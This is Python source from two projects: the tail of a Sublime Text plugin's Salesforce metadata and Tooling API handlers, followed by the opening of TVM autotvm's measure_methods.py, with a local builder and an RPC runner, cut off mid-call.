    """
    def handle_thread(thread, timeout):
        # Poll until the describe_global thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Exception Process
        if not api.result["success"]: return

        # If succeed
        sobjects = []
        for sd in api.result["sobjects"]:
            if "name" not in sd: continue
            sobjects.append(sd["name"])

        # One chunk per allowed concurrent connection
        mcc = settings["maximum_concurrent_connections"]
        chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
        for sobjects in chunked_sobjects:
            thread = threading.Thread(target=api.generate_workbook, args=(sobjects,))
            thread.start()

    settings = context.get_settings()
    api = ToolingApi(settings)
    thread = threading.Thread(target=api.describe_global, args=())
    thread.start()
    ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
    handle_thread(thread, timeout)
def handle_new_project(is_update=False, timeout=120):
    """
    Retrieve all subscribed metadata from the org and extract it into the workspace.

    @param is_update: True when refreshing an existing project instead of creating one
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If failed, but something may happen,
        # for example, user password is expired
        result = api.result
        if not result or not result["success"]: return

        # Extract the apex code to workspace
        extract_to = settings["workspace"]

        # Just remove the packages folder
        if os.path.exists(extract_to):
            # Remove packages directory; best effort, e.g. files may be locked
            if os.path.exists(os.path.join(extract_to, "packages")):
                try:
                    shutil.rmtree(os.path.join(extract_to, "packages"))
                except Exception as e:
                    pass

        # Makedir for subscribed meta types
        for metadata_folder in settings["subscribed_metadata_folders"]:
            outputdir = os.path.join(extract_to, "src", metadata_folder)
            if not os.path.exists(outputdir): os.makedirs(outputdir)

        # Extract the zipFile to extract_to
        thread = threading.Thread(target=util.extract_encoded_zipfile,
                                  args=(result["zipFile"], extract_to,))
        thread.start()

        # Apex Code Cache
        if "fileProperties" in result and isinstance(result["fileProperties"], list):
            util.reload_file_attributes(result["fileProperties"], settings)
        else:
            if settings["debug_mode"]:
                print('[Debug] fileProperties:\n' + json.dumps(result, indent=4))

        # Hide panel
        sublime.set_timeout_async(Printer.get("log").hide_panel, 500)

        # Reload sObject Cache and SymbolTables
        if not is_update:
            handle_reload_sobjects_completions()
            if settings["reload_symbol_tables_when_create_project"]:
                handle_reload_symbol_tables()

    settings = context.get_settings()
    api = MetadataApi(settings)
    # Subscribe to every member of each configured metadata type
    types = {xml_name: ["*"] for xml_name in settings["subscribed_metadata_objects"]}
    thread = threading.Thread(target=api.retrieve, args=({
        "types": types,
        "package_names": settings["allowed_packages"]
    },))
    thread.start()
    # Fixed typo (`wating_message`) and the double space the old concatenation
    # produced ("Creating New  Project" / "Updating  Project")
    waiting_message = ("Creating New" if not is_update else "Updating") + " Project"
    ThreadProgress(api, thread, waiting_message, waiting_message + " Finished")
    handle_thread(thread, timeout)
def handle_describe_metadata(callback_options, timeout=120):
    """
    Describe the org's metadata, cache it to <workspace>/.config/metadata.json,
    then optionally trigger a follow-up window command.

    @param callback_options: dict that may contain "callback_command" and "args"
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the describeMetadata call finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Exception is processed in ThreadProgress
        if not api.result or not api.result["success"]: return

        result = api.result
        del result["success"]

        # Cache the describe result to <workspace>/.config/metadata.json
        settings = context.get_settings()
        cache_dir = os.path.join(settings["workspace"], ".config")
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
        cache_file = os.path.join(cache_dir, "metadata.json")
        with open(cache_file, "w") as fp:
            fp.write(json.dumps(result, indent=4))

        if "callback_command" in callback_options:
            settings = context.get_settings()
            callback_command = callback_options["callback_command"]
            args = callback_options["args"] if "args" in callback_options else {}

            # If project already have subscribed_metadata_objects, just stop
            if "subscribed_metadata_objects" in settings["default_project"] and \
                    settings["default_project"]["subscribed_metadata_objects"]:
                return sublime.active_window().run_command(callback_command, args)

            # If project doesn't have subscribed_metadata_objects, we need
            # to choose which metadata_objects to subscribe, which will be saved
            # into default project
            sublime.active_window().run_command("toggle_metadata_objects", {
                "callback_options": callback_options
            })

    # Start to request
    settings = context.get_settings()
    api = MetadataApi(settings)
    thread = threading.Thread(target=api._invoke_method, args=("describeMetadata",))
    thread.start()
    # NOTE(review): the poll is kicked off before ThreadProgress here, unlike most
    # siblings; both merely observe the thread, so the ordering is harmless
    handle_thread(thread, timeout)
    ThreadProgress(api, thread, "Describe Metadata of v%s.0" % settings["api_version"],
                   "Describe Metadata Finished")
def handle_rename_metadata(file_name, meta_type, old_name, new_name, timeout=120):
    """
    Rename a metadata component on the server, then rename the local file to match.

    @param file_name: path of the local file to rename after the server rename succeeds
    @param meta_type: metadata type, e.g. ApexClass
    @param old_name: current component name
    @param new_name: desired component name
    @param timeout: polling interval in milliseconds for the result check
    @return: None
    """
    def handle_thread(thread, timeout):
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If not succeed, just stop
        if not api.result or not api.result["success"]: return
        result = api.result
        if "errors" in result:
            return Printer.get("error").write(result["errors"]["message"])

        # Rename only the file's base name; the original ran str.replace over the
        # whole path, which could also rewrite directory components that happened
        # to contain old_name
        dir_name, base_name = os.path.split(file_name)
        os.rename(file_name, os.path.join(dir_name, base_name.replace(old_name, new_name)))

    # Start to request
    settings = context.get_settings()
    api = MetadataApi(settings)
    options = {"type": meta_type, "old_name": old_name, "new_name": new_name}
    thread = threading.Thread(target=api._invoke_method, args=("renameMetadata", options,))
    thread.start()
    handle_thread(thread, timeout)
    message = "Renaming %s from %s to %s" % (
        meta_type, old_name, new_name
    )
    ThreadProgress(api, thread, message, "Renaming Finished")
def handle_reload_project_cache(types, callback_command, timeout=120):
    """Rebuild the .config/package.json metadata cache for the project.

    @param types: metadata types whose members should be (re)fetched
    @param callback_command: window command to run after the cache is written
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        if not api.result or not api.result["success"]:
            return
        fetched = api.result["types"]
        cache_dir = os.path.join(settings["workspace"], ".config")
        cache_file = os.path.join(cache_dir, "package.json")
        cache = fetched
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
        elif os.path.isfile(cache_file):
            # Merge freshly fetched types into the existing cache file
            cache = json.loads(open(cache_file).read())
            for _type in fetched:
                cache[_type] = fetched[_type]
        with open(cache_file, "w") as fp:
            fp.write(json.dumps(cache, indent=4))
        if callback_command:
            sublime.active_window().run_command(callback_command)

    settings = context.get_settings()
    api = MetadataApi(settings)
    worker = threading.Thread(target=api.prepare_members, args=(types, True,))
    worker.start()
    _poll(worker, timeout)
    ThreadProgress(api, worker, "Reloading Project Cache", "Reload Project Cache Succeed")
def handle_retrieve_package(types, extract_to, source_org=None, ignore_package_xml=False, timeout=120):
    """
    Retrieve package via Metadata API

    @param types: metadata type dict like {"AuraDefinitionBundle":["aura1", "aura2"]}
    @param extract_to: target directory to extract the retrieved zip into
        (usually settings["workspace"])
    @param source_org: source Salesforce org; when set together with the
        switch_back_after_migration setting, the project is switched back
        to it once the retrieve finishes
    @param ignore_package_xml: ignore package xml file during extraction
    @param timeout: polling interval in milliseconds for the worker thread
    @return: None
    """
    def handle_thread(_thread, timeout):
        # Poll until the retrieve worker thread completes
        if _thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(_thread, timeout), timeout)
            return

        # If source_org is not None, we need to switch project back
        if settings["switch_back_after_migration"] and source_org:
            util.switch_project(source_org)

        # Extract the zipFile to extract_to on another background thread,
        # so the UI thread is not blocked by disk I/O
        if api.result and api.result["success"]:
            _thread = threading.Thread(target=util.extract_encoded_zipfile,
                                       args=(api.result["zipFile"], extract_to, ignore_package_xml,))
            _thread.start()

            # Cache component attributes in metadata settings so the
            # save-to-server functionality knows about the retrieved files
            # print("fileProperties:", api.result.get("fileProperties", None))
            if isinstance(api.result.get("fileProperties", None), list):
                util.reload_file_attributes(
                    api.result["fileProperties"],
                    settings, append=True
                )

    # Start to request
    settings = context.get_settings()
    api = MetadataApi(settings)
    thread = threading.Thread(target=api.retrieve, args=({"types": types},))
    thread.start()
    handle_thread(thread, timeout)
    ThreadProgress(api, thread,
                   "Retrieve File From Server",
                   "Retrieve File From Server Succeed")
def handle_save_to_server(file_name, is_check_only=False, timeout=120):
    """
    Handle Save metadata to Salesforce via Tooling API

    A per-user, per-file flag is kept in globals() so that two saves of
    the same file cannot run concurrently.

    @param file_name: file name with path format
    @param is_check_only: only check the file from Salesforce, do not really save
    @param timeout: polling interval in milliseconds for the worker thread
    @return: None
    """
    def handle_thread(thread, timeout):
        # Re-schedule until the save/compile worker thread finishes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # Set Thread alive flag to False so the file may be saved again
        globals()[username + file_base_name] = False

        # Process request result
        result = api.result

        # If user cancelled the conflict dialog, just diff with server
        if "Operation" in result and result["Operation"] == "cancel":
            handle_diff_with_server(component_attribute, file_name)
            return

        if "success" in result and result["success"]:
            # 1. Write succeed body to local change history
            if settings["keep_local_change_history"] and not is_check_only:
                # Append message to output panel
                Printer.get('log').write("Start to keep local change history")
                # Get Workspace, if not exist, make it
                workspace = settings["workspace"] + "/.history/" + component_attribute["type"]
                if not os.path.exists(workspace):
                    os.makedirs(workspace)
                # Backup current file under a timestamped name
                time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
                output_dir = workspace + "/" + component_name + "-" + time_stamp + "-history" + extension
                with open(output_dir, "wb") as fp:
                    fp.write(body.encode("utf-8"))

            # Output succeed message in the console
            save_or_compile = "Compiled" if is_check_only else "Saved"
            Printer.get('log').write("%s %s successfully" % (save_or_compile, file_base_name))

            # Add total seconds message (wall time since the save started)
            dt = datetime.datetime.now() - start_time
            total_seconds = dt.seconds + dt.microseconds / 1e6
            Printer.get('log').write("\nTotal time: %.2f seconds" % total_seconds, False)

            # Remove any previous build-error highlight in the view
            view = util.get_view_by_file_name(file_name)
            if view:
                component_id = component_attribute["id"]
                view.run_command("remove_check_point", {"mark": component_id + "build_error"})

            # If succeed, just hide the output panel several seconds later
            delay_seconds = settings["delay_seconds_for_hidden_output_panel_when_succeed"]
            sublime.set_timeout_async(Printer.get("log").hide_panel, delay_seconds * 1000)

            # If track_log_after_saved is true, track self debug log asynchronously
            if settings["track_log_after_saved"]:
                thread = threading.Thread(target=api.create_trace_flag)
                thread.start()

            # After all are finished, keep the LastModifiedDate up to date
            handle_set_component_attribute(component_attribute)

        # If not succeed, just go to the error line
        # Because error line in page is always at the line 1, so just work in class or trigger
        elif "success" in result and not result["success"]:
            print('error result', result)
            # Maybe network issue
            _message = "Unknown Problem!"
            if "problem" in result:
                _message = "Compile Error for %s: %s at line %s column %s" % (
                    file_base_name,
                    result["problem"],
                    result["lineNumber"],
                    result["columnNumber"]
                )
            elif "message" in result:
                _message = result["message"]
            Printer.get('log').write(_message)

            # Get the active view
            view = util.get_view_by_file_name(file_name)
            # Check current view is the saving code file; otherwise skip navigation
            if not view or not view.file_name(): return
            if not file_base_name in view.file_name(): return
            if not extension in [".trigger", ".cls", ".page", ".cmp", '.js', '.css']: return

            # Error responses carry the line number under different keys
            if "line" in result:
                line = result["line"]
            elif "lineNumber" in result:
                line = result["lineNumber"]
            else:
                return
            if isinstance(line, list): line = line[0]
            # Skip page errors reported at line 1 (see comment above)
            if extension == ".page" and line < 2: return

            view.run_command("goto_line", {"line": line})
            view.run_command("expand_selection", {"to": "line"})
            if hasattr(view, 'show_popup'):
                error = """
                    <div>
                        <h3>Compile Error for %s</h3>
                        <p style="color: red">
                            <b>%s</b> at line <b>%s</b> column <b>%s</b>
                        </p>
                    </div>
                """ % (
                    file_base_name,
                    result["problem"],
                    result["lineNumber"],
                    result["columnNumber"]
                )
                view.show_popup(error)

            # Add highlight for error line; it is removed on the next successful save
            component_id = component_attribute["id"]
            view.run_command("set_check_point", {"mark": component_id + "build_error"})

    # 1. Get component attribute and body content
    component_attribute, component_name = util.get_component_attribute(file_name)
    body = open(file_name, encoding="utf-8").read()

    # Component Full Name
    extension = component_attribute["extension"]
    file_base_name = component_name + extension

    # Log start_time for the "Total time" message
    start_time = datetime.datetime.now()

    # If saving is in process, just skip
    settings = context.get_settings()
    username = settings["username"]
    if username + file_base_name in globals():
        is_thread_alive = globals()[username + file_base_name]
        if is_thread_alive:
            print('%s is in process' % file_base_name)
            return

    # Open output panel
    compile_or_save = "compile" if is_check_only else "save"
    Printer.get('log').write_start().write("Start to %s %s" % (compile_or_save, file_base_name))

    api = ToolingApi(settings)
    # Lightning bundles are saved through a dedicated endpoint
    lngt_meta_type = ["AuraDefinitionBundle", "AuraDefinition",
                      "LightningComponentBundle", "LightningComponentResource"]
    if component_attribute["type"] in lngt_meta_type:
        target = api.save_lightning_to_server
    else:
        target = api.save_to_server
    thread = threading.Thread(target=target,
                              args=(component_attribute, body, is_check_only,))
    thread.start()

    # If saving thread is started, set the flag to True
    globals()[username + file_base_name] = True

    # Display thread progress
    wait_message = ("Compiling " if is_check_only else "Saving ") + component_name
    ThreadProgress(api, thread, wait_message, wait_message + " Succeed", show_error=False)
    handle_thread(thread, timeout)
def handle_create_component(data, component_name, component_type, markup_or_body, file_name, timeout=120):
    """
    Handle create Apex Class/Trigger/Page/Component via Tooling API

    @param data: component data to create, dict like {"name": "Aclass.cls", "body": content_body}
    @param component_name: component name without extension
    @param component_type: component type in [ApexClass, ApexPage, ApexTrigger, ApexComponent]
    @param markup_or_body: content of the code
    @param file_name: os file path
    @param timeout: polling interval in milliseconds for the worker thread
    @return: None
    """
    def handle_thread(thread, timeout):
        # Poll until the create request worker thread completes
        if thread.is_alive():
            sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
            return

        # If create Succeed
        result = api.result
        # If created failed, just remove the local file
        if not result["success"]:
            os.remove(file_name)
            return

        # If created succeed, just open it
        sublime.active_window().open_file(file_name)

        # Get the created component id
        component_id = result.get("id")
        extension = "." + settings[component_type]["suffix"]

        # Save it to component.sublime-settings
        s = sublime.load_settings(COMPONENT_METADATA_SETTINGS)
        username = settings["username"]
        components_dict = s.get(username, {})

        # Prevent exception for creating component if no component in org
        if component_type not in components_dict:
            if not components_dict:
                components_dict = {component_type: {}}
            else:
                components_dict[component_type] = {}

        # Build components dict entry for the new component
        lower_name = component_name.lower()
        attributes = {
            "id": component_id,
            "name": component_name,
            "url": post_url + "/" + component_id,
            "body": markup_or_body,
            "extension": extension,
            "type": component_type,
            # Heuristic test-class detection by name prefix/suffix
            "is_test": lower_name.startswith("test") or lower_name.endswith("test")
        }
        components_dict[component_type][full_name.lower()] = attributes
        s.set(username, components_dict)

        # Save settings and show success message
        sublime.save_settings(COMPONENT_METADATA_SETTINGS)

        # After new component is stored into cache, reload cache in globals()
        sublime.set_timeout(lambda: util.load_metadata_cache(True), 50)

        # Create Meta.xml file content (classes/triggers need a status,
        # pages/components need a label)
        if component_type in ["ApexClass", "ApexTrigger"]:
            meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + \
                "<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" + \
                "    <apiVersion>{1}.0</apiVersion>\n" + \
                "    <status>Active</status>\n" + \
                "</{0}>").format(component_type, settings["api_version"])
        elif component_type in ["ApexPage", "ApexComponent"]:
            meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + \
                "<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" + \
                "    <apiVersion>{1}.0</apiVersion>\n" + \
                "    <label>{2}</label>\n" + \
                "</{0}>").format(component_type, settings["api_version"], component_name)

        # Generate new meta.xml file next to the component file
        # NOTE(review): meta_file_content is only assigned for the four
        # documented component types; other types would raise here -- confirm
        # callers never pass anything else
        with open(file_name + "-meta.xml", "w") as fp:
            fp.write(meta_file_content)

        # After all are finished, we need to keep the lastModifiedDate
        handle_set_component_attribute(attributes)

    settings = context.get_settings()
    api = ToolingApi(settings)
    post_url = "/sobjects/" + component_type
    thread = threading.Thread(target=api.post, args=(post_url, data,))
    thread.start()
    full_name = os.path.basename(file_name)
    ThreadProgress(api, thread, "Creating Component %s" % full_name,
                   "Creating Component %s Succeed" % full_name)
    handle_thread(thread, timeout)
def handle_set_component_attribute(attributes, timeout=120):
    """Query a component's LastModifiedDate and store it in the local cache.

    @param attributes: component attribute dict; "type" and "id" are used
        to build the SOQL query
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        outcome = api.result
        if outcome["success"] and outcome["records"]:
            lastModifiedDate = outcome["records"][0]["LastModifiedDate"]
            util.set_component_attribute(attributes, lastModifiedDate)
        elif settings["debug_mode"]:
            pprint.pprint(outcome)
        # Refresh metadata cache so later operations see the new date
        util.load_metadata_cache(True)

    settings = context.get_settings()
    api = ToolingApi(settings)
    soql = "SELECT LastModifiedDate FROM %s WHERE Id = '%s'" % (
        attributes["type"], attributes["id"]
    )
    worker = threading.Thread(target=api.query, args=(soql, True,))
    worker.start()
    _poll(worker, timeout)
def handle_refresh_static_resource(component_attribute, file_name, timeout=120):
    """Re-download a StaticResource body and overwrite the local file.

    @param component_attribute: cached attributes of the resource (needs "url")
    @param file_name: local path to overwrite with the downloaded body
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        if not api.result["success"]:
            return
        # Write the fetched body over the local copy
        with open(file_name, "wb") as fp:
            fp.write(api.result["body"].encode("utf-8"))

    settings = context.get_settings()
    api = ToolingApi(settings)
    url = component_attribute["url"] + "/body"
    worker = threading.Thread(target=api.retrieve_body, args=(url,))
    worker.start()
    ThreadProgress(api, worker, 'Refresh StaticResource', 'Refresh StaticResource Succeed')
    _poll(worker, timeout)
def handle_create_static_resource(data, timeout=120):
    """Create a StaticResource record through the Tooling API.

    @param data: field dict posted as the StaticResource sobject body
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        if not api.result["success"]:
            return
        # Echo the creation result to the console on success
        print(api.result)

    settings = context.get_settings()
    api = ToolingApi(settings)
    url = "/tooling/sobjects/StaticResource"
    worker = threading.Thread(target=api.post, args=(url, data,))
    worker.start()
    ThreadProgress(api, worker, 'Creating StaticResource', 'Creating StaticResource Succeed')
    _poll(worker, timeout)
def handle_diff_with_server(component_attribute, file_name, source_org=None, timeout=120):
    """Fetch the server copy of a component and diff it against the local file.

    @param component_attribute: cached attributes of the component (needs "url")
    @param file_name: path of the local file to compare
    @param source_org: when set (together with switch_back_after_migration),
        switch the project back to this org after the diff completes
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        outcome = api.result
        # Errors are already reported by ThreadProgress; nothing more to do
        if not outcome["success"]:
            return
        # Show the local-vs-server comparison
        diff.diff_changes(file_name, outcome)
        # Switch the project back when this diff was part of a migration
        if settings["switch_back_after_migration"] and source_org:
            util.switch_project(source_org)

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.get, args=(component_attribute["url"],))
    worker.start()
    _poll(worker, timeout)
    ThreadProgress(api, worker, 'Diff With Server', 'Diff With Server Succeed')
def handle_refresh_file_from_server(attr, file_name, timeout=120):
    """Overwrite a local file with its latest content from the server.

    @param attr: component attribute dict; attr["url"] is fetched and
        attr["body"] names the response field that holds the content
    @param file_name: local path to overwrite
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        outcome = api.result
        if not outcome["success"]:
            return
        # Write the refreshed content over the local copy
        with open(file_name, "wb") as fp:
            fp.write(outcome[attr["body"]].encode("utf-8"))

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.get, args=(attr["url"],))
    worker.start()
    ThreadProgress(api, worker, 'Refreshing %s' % os.path.basename(file_name), 'Refresh Succeed')
    _poll(worker, timeout)
def handle_delete_component(component_url, file_name, timeout=120):
    """Delete a component on the server, then remove its local file(s).

    @param component_url: REST url of the component to delete
    @param file_name: local file path; the matching -meta.xml is removed too
    @param timeout: polling interval in milliseconds for the worker thread
    """

    def _close_and_remove(window, path):
        # Close any open view on the file, then delete it from disk
        view = util.get_view_by_file_name(path)
        if view:
            window.focus_view(view)
            window.run_command("close")
        os.remove(path)

    def _poll(worker, interval):
        if worker.is_alive():
            sublime.set_timeout(lambda: _poll(worker, interval), interval)
            return
        if not api.result["success"]:
            return
        window = sublime.active_window()
        _close_and_remove(window, file_name)
        # Remove the related cls-meta.xml when present
        if os.path.exists(file_name + "-meta.xml"):
            _close_and_remove(window, file_name + "-meta.xml")

    settings = context.get_settings()
    api = ToolingApi(settings)
    worker = threading.Thread(target=api.delete, args=(component_url,))
    worker.start()
    file_base_name = os.path.basename(file_name)
    ThreadProgress(api, worker, "Deleting " + file_base_name,
                   "Delete " + file_base_name + " Succeed")
    _poll(worker, timeout)
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
import tvm.ir.transform
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar, cc
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
    """
    Stores the outputs of building one configuration for a measurement.

    Parameters
    ----------
    filename : str
        The filename of generated library
    arg_info : Tuple
        The shape and dtype information of tvm tensor arguments
    error : Exception
        The error happens during compilation.
    time_cost : float
        The time cost of building
    """
class LocalBuilder(Builder):
    """Run compilation on local machine

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    build_func: callable or str
        If is 'default', use default build function
        If is 'ndk', use function for android ndk
        If is 'g++', use g++ to create a shared library
        If is callable, use it as custom build function, expect lib_format field.
    """
    def __init__(self, timeout=10, n_parallel=None, build_func='default'):
        super(LocalBuilder, self).__init__(timeout, n_parallel)

        if isinstance(build_func, str):
            if build_func == 'default':
                build_func = tar.tar
            elif build_func == 'ndk':
                build_func = ndk.create_shared
            elif build_func == 'g++':
                build_func = cc.create_shared
            else:
                # BUGFIX: add a separator so the offending value is readable
                # (previously rendered e.g. "Invalid build_funcgcc")
                raise ValueError("Invalid build_func: " + build_func)
        self.build_func = _wrap_build_func(build_func)
        self.executor = LocalExecutor(timeout=timeout)
        self.tmp_dir = tempfile.mkdtemp()

    def build(self, measure_inputs):
        """Build a batch of measure inputs in parallel.

        Parameters
        ----------
        measure_inputs : List of MeasureInput
            The configurations to compile.

        Returns
        -------
        List of BuildResult or MeasureResult
            One entry per input; build failures are wrapped in MeasureResult.
        """
        results = []

        # Start each batch with a fresh temporary directory so stale
        # libraries from a previous batch cannot be picked up
        shutil.rmtree(self.tmp_dir, ignore_errors=True)
        self.tmp_dir = tempfile.mkdtemp()

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for inp in measure_inputs[i:i + self.n_parallel]:
                ret = self.executor.submit(self.build_func,
                                           inp,
                                           self.tmp_dir,
                                           **self.build_kwargs)
                futures.append(ret)

            for future in futures:
                res = future.get()

                if isinstance(res, Exception):
                    # timeout or fleet error, return MeasureResult directly
                    results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
                                                 self.timeout, time.time()))
                elif res.error is not None:
                    # instantiation error
                    if isinstance(res.error, InstantiationError):
                        results.append(MeasureResult((res.error,),
                                                     MeasureErrorNo.INSTANTIATION_ERROR,
                                                     res.time_cost, time.time()))
                    else:
                        if "InstantiationError" in str(res.error):
                            # Extract the human-readable reason from the traceback text
                            msg = str(res.error)
                            try:
                                msg = msg.split('\n')[-2].split(": ")[1]
                            except Exception:  # pylint: disable=broad-except
                                pass
                            results.append(MeasureResult((InstantiationError(msg),),
                                                         MeasureErrorNo.INSTANTIATION_ERROR,
                                                         res.time_cost, time.time()))
                        else:  # tvm error
                            results.append(MeasureResult((res.error,),
                                                         MeasureErrorNo.COMPILE_HOST,
                                                         res.time_cost, time.time()))
                else:
                    # successful compilation: return BuildResult as-is
                    results.append(res)

        return results
class RPCRunner(Runner):
    """Run generated code on remote devices.
    This runner will ask a RPC Tracker to get a device for measurement.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    key: str
        The key of the device registered in the tracker
    host: str
        The host address of RPC Tracker
    port: int
        The port of RPC Tracker
    priority: int, optional
        The priority of requests sent to the tracker
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first "1" is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.
    """
    def __init__(self,
                 key, host, port, priority=1,
                 timeout=10, n_parallel=None,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        super(RPCRunner, self).__init__(timeout, n_parallel)

        self.key = key
        self.host = host
        self.port = port
        self.priority = priority
        self.timeout = timeout

        self.number = number
        self.repeat = repeat
        self.min_repeat_ms = min_repeat_ms

        # Reference input/output pair, populated by set_task when
        # check_correctness is enabled
        self.ref_input = None
        self.ref_output = None
        self.check_correctness = check_correctness
        self.cooldown_interval = cooldown_interval

        self.executor = LocalExecutor()

    def set_task(self, task):
        """Bind a tuning task and verify that a matching remote device
        is reachable through the tracker.

        Raises RuntimeError when the tracker has no free matching device.
        When check_correctness is enabled, also builds a reference
        input/output pair with the llvm cpu target.
        """
        self.task = task

        if check_remote(task.target, self.key, self.host, self.port):
            logger.info("Get devices for measurement successfully!")
        else:
            raise RuntimeError("Cannot get remote devices from the tracker. "
                               "Please check the status of tracker by "
                               "'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
                               "and make sure you have free devices on the queue status.")

        if self.check_correctness:
            # use llvm cpu to generate a reference input/output
            # this option works for tuning topi, but might not work for you custom op
            with _target.create("llvm"):
                s, arg_bufs = task.instantiate(task.config_space.get(0))
            self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
                              for x in arg_bufs]
            func = build(s, arg_bufs, "llvm")
            tvm_buf = [nd.array(x) for x in self.ref_input]
            func(*tvm_buf)
            self.ref_output = [x.asnumpy() for x in tvm_buf]

    def get_build_kwargs(self):
        """Collect device-dependent build options (GPU limits, cuda arch,
        micro_dev vectorize flag) by querying one remote device context."""
        kwargs = {}
        if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
                'rocm' in self.task.target.keys or 'vulkan' in self.task.target.keys:
            remote = request_remote(self.key, self.host, self.port)
            ctx = remote.context(str(self.task.target), 0)
            max_dims = ctx.max_thread_dimensions
            kwargs['check_gpu'] = {
                'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
                'max_threads_per_block': ctx.max_threads_per_block,
                'max_thread_x': max_dims[0],
                'max_thread_y': max_dims[1],
                'max_thread_z': max_dims[2],
            }

            if 'cuda' in self.task.target.keys:
                kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))

        if self.task.target.device_name == 'micro_dev':
            kwargs.setdefault('build_option', {})['tir.disable_vectorize'] = True

        return kwargs

    def run(self, measure_inputs, build_results):
        """Run built libraries on remote devices in batches of n_parallel.

        Returns one MeasureResult per input; executor errors and timeouts
        are converted to RUN_TIMEOUT results.
        """
        results = []
        remote_args = (self.key, self.host, self.port, self.priority, self.timeout)

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
                                              build_results[i:i+self.n_parallel]):
                ret = self.executor.submit(run_through_rpc,
                                           measure_inp,
                                           build_res,
                                           self.number,
                                           self.repeat,
